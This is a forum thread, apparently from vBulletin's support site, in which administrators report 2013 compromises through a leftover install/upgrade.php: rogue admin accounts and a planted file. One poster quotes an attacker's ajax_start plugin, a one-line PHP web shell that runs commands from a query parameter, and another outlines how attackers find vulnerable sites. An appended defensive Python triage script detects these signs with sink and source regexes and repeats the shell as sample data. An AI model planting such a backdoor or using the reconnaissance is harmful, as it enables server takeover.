A new type hack method?


  • ToddG
    replied
    Originally posted by KryptonSite
    I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

    I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?
    This exact thing happened to our forum today, as well. We've deleted the install directory and his account and are now trying to figure out what, if anything, he may have done to our system.

  • runawayjim
    replied
    My ajax_start plugin seems to be failing. The code in it looks suspect, but it could be normal.

    There is a file called fuhosin.php in my /forum/ directory that is signed by a hacker. I deleted it. Not sure if a different version of that should be there or not.

  • Reignman
    replied
    Originally posted by djsteve007
    vBulletin 4.2.1 running, and had new member moderation turned on -

    what I wonder is how they were able to run SQL insert commands from /forums/core/install/upgrade.php --- when I do not even have a /core/ or /core/install/ folder on this server.
    If you use version 4, you don't have /core/install but only /install in your forum root.

  • DemOnstar
    replied
    Originally posted by djsteve007

    Will we get an email if the exploit fix is found?
    I think that is extremely likely now. Although stranger things can happen...

  • DemOnstar
    commented on 's reply
    Very good Reignman, that is exactly what I wanted to hear... It seems so easy to mess up someone's life... and all that is needed is a search on Google... Extraordinary!

  • djsteve007
    replied
    Looks like I got hit with a similar exploit - they did not deface my site like the OP's - not yet anyway. They did find a way to add about 10 new users, all with the same username (Th3H4ck) and all with admin privs.

    I would not have known about this vulnerability, or the active exploit, if they had not .. maybe I should not post what triggered my knowledge of this.

    I would have liked to have received an email about this exploit. Now going to 302 redirect to my buddypress install. Hope my host has a backup of the database and files from 5 days ago. Fingers crossed.

    vBulletin 4.2.1 running, and had new member moderation turned on -

    what I wonder is how they were able to run SQL insert commands from /forums/core/install/upgrade.php --- when I do not even have a /core/ or /core/install/ folder on this server.

    Will we get an email if the exploit fix is found?

  • mat8861
    replied
    What about VB not sending an advice email to licensed members?? I was here for another problem and now I am reading this thread, really surprised!!

  • Reignman
    replied
    Originally posted by DemOnstar
    How does something like this get around so quickly?
    Not a robot, or a macro, this is an individual or group of individuals exploiting a vulnerability...
    I haven't been affected yet, maybe because I was active in the admin cp at the time of the notification and deleted the install folder?

    But is the install folder the hole? Has this been clarified?

    How do they find a vulnerable site to begin with? Surely there is no google search term 'vulnerable vB sites'.

    What do they search for in order to complete the job?
    Yes, the hole is in the install folder (at least for this exploit).

    They search for vBulletin-powered websites using phrases like (powered by vbulletin 4.2.0 / 4.2.1 / 5) and then they check manually if the install folder exists by typing domain.com/forumpath/install/upgrade.php

    If it exists they complete the job using the exploit they found. (I wonder if the vBulletin team has found what it is yet???) If it doesn't exist, they turn back to "Google" and search for other potential victims.

    But what we know is they can use this exploit only on the 4.2.0+ and 5 versions of vBulletin.
    Last edited by Reignman; Mon 2 Sep '13, 5:01am.

  • DemOnstar
    replied
    How does something like this get around so quickly?
    Not a robot, or a macro, this is an individual or group of individuals exploiting a vulnerability...
    I haven't been affected yet, maybe because I was active in the admin cp at the time of the notification and deleted the install folder?

    But is the install folder the hole? Has this been clarified?

    How do they find a vulnerable site to begin with? Surely there is no google search term 'vulnerable vB sites'.

    What do they search for in order to complete the job?

  • Jntu Hub
    replied
    My site was hacked with a new name.

  • Reignman
    replied
    Originally posted by KryptonSite
    I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

    I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?
    Do you have any "strange" plugins on your vBulletin products? It's one of the symptoms of this exploit.

    Originally posted by Infection

    I'm using version 4.2.0 (I've yet to update to the latest 4.2.1 version). There is definitely no "install" directory in my forum's root folder, as far as I can see. It could be another vulnerability.

    Does anyone have any ideas as to what this could be?
    Probably it's another one. Better contact vBulletin support.

    Bad thing is I see slight changes in the code, hacking messages. So I think it's now spread around.

  • Infection
    replied
    Originally posted by Reignman

    Which version do you use? If you use vBulletin 5, the install directory is inside the core directory. >>> /core/install

    He needs install/upgrade.php in order to complete the hijacking, so if you don't have an "install" directory and you still have the above problem, that means it's another vulnerability.
    I'm using version 4.2.0 (I've yet to update to the latest 4.2.1 version). There is definitely no "install" directory in my forum's root folder, as far as I can see. It could be another vulnerability.

    Does anyone have any ideas as to what this could be?

  • KryptonSite
    replied
    I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

    I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?

  • Reignman
    replied
    Originally posted by Infection
    I have the same problem. The hacker has registered as an Admin, then created this plugin with the hook location ajax_start:

    Code:
    // attacker-planted web shell: runs whatever shell command arrives in the "lol" query parameter
    if(isset($_GET['lol'])){echo "<h1>pwn</h1><pre>"; system($_GET['lol']);exit;}
    Please advise. I didn't have the install directory at all prior to this hack.
    Which version do you use? If you use vBulletin 5, the install directory is inside the core directory. >>> /core/install

    He needs install/upgrade.php in order to complete the hijacking, so if you don't have an "install" directory and you still have the above problem, that means it's another vulnerability.

  • Infection
    replied
    I have the same problem. The hacker has registered as an Admin, then created this plugin with the hook location ajax_start:

    Code:
    // attacker-planted web shell: runs whatever shell command arrives in the "lol" query parameter
    if(isset($_GET['lol'])){echo "<h1>pwn</h1><pre>"; system($_GET['lol']);exit;}
    Please advise. I didn't have the install directory at all prior to this hack.

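Defender-side triage for the symptoms reported in this thread: the leftover install/upgrade.php that Reignman identifies as the hole, the ajax_start plugin backdoor Infection posted, and the surprise admin accounts several posters found. This is an added example, not code from the thread or from vBulletin; it assumes a vBulletin web root path, plugin rows exported from the `plugin` table as (title, hookname, phpcode), admin accounts in usergroupid 6 (the default Administrators group), and sink/source regexes that are heuristics to tune.

```python
"""Triage checks for the vBulletin compromise symptoms in this thread (added example).

Assumptions: forum_root is a vBulletin web root; plugin rows are (title, hookname, phpcode)
tuples exported from the `plugin` table; admins sit in usergroupid 6, the default
Administrators group; the regexes below are heuristics, not an exhaustive list."""
import os
import re

# PHP functions that execute commands or code. Combined with raw request input in a
# plugin body, this is the web-shell pattern quoted in the thread.
SINK_RE = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(")
SOURCE_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
ADMIN_GROUP_ID = 6  # vBulletin default; verify against your own usergroup table


def install_dir_present(forum_root):
    """True while the post-install upgrader is still on disk (vB4: /install, vB5: /core/install)."""
    candidates = ("install", os.path.join("core", "install"))
    return any(os.path.isfile(os.path.join(forum_root, d, "upgrade.php")) for d in candidates)


def suspicious_plugins(rows):
    """Return (title, hookname) of plugins that feed request input into a command/code sink."""
    return [(title, hook) for title, hook, code in rows
            if SINK_RE.search(code) and SOURCE_RE.search(code)]


def unexpected_admins(users, known_admin_ids):
    """Return admin-group accounts whose userid is not on the operator's own list."""
    return [(uid, name) for uid, name, gid in users
            if gid == ADMIN_GROUP_ID and uid not in known_admin_ids]


# Constructed sample data: one benign plugin plus the backdoor quoted in the thread,
# and a user table with one legitimate admin and the "Th3H4ck" account djsteve007 saw.
SAMPLE_PLUGINS = [
    ("Footer tweak", "global_start", "$vbulletin->options['footer_note'] = 1;"),
    ("", "ajax_start",
     "if(isset($_GET['lol'])){echo \"<h1>pwn</h1><pre>\"; system($_GET['lol']);exit;}"),
]
SAMPLE_USERS = [(1, "owner", 6), (2, "member", 2), (3, "Th3H4ck", 6)]

if __name__ == "__main__":
    print("install dir present:", install_dir_present("."))
    print("suspicious plugins:", suspicious_plugins(SAMPLE_PLUGINS))
    print("unexpected admins:", unexpected_admins(SAMPLE_USERS, {1}))
```

Run it against a real export of the `plugin` and `user` tables rather than the sample data; a hit on an unfamiliar hook such as ajax_start is the first thing to pull before restoring from backup.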